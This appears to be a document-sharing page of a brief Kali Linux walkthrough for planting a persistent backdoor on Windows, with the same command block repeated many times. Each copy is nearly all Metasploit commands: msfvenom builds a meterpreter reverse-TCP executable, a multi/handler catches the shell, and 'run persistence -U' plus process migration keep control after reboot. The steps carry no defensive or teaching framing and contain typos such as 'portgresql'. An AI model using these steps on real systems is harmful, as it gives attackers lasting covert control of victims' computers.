0% found this document useful (0 votes)
286 views18 pages

Makes Persistent Backdoor After Exploit in Kali Linux

The document outlines steps to create a persistent meterpreter backdoor on a Windows system after exploiting it from Kali Linux. It involves using msfvenom to generate an executable, starting Apache and PostgreSQL services, using msfconsole to set up a multi/handler, running persistence commands on the meterpreter session, and migrating to another process ID.

Uploaded by

signup101
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
286 views18 pages

Makes Persistent Backdoor After Exploit in Kali Linux

The document outlines steps to create a persistent meterpreter backdoor on a Windows system after exploiting it from Kali Linux. It involves using msfvenom to generate an executable, starting Apache and PostgreSQL services, using msfconsole to set up a multi/handler, running persistence commands on the meterpreter session, and migrating to another process ID.

Uploaded by

signup101
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

Make persistent backdoor after exploit in kali linux

root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp


root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options


root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options


root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h


meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start


root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system


msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

You might also like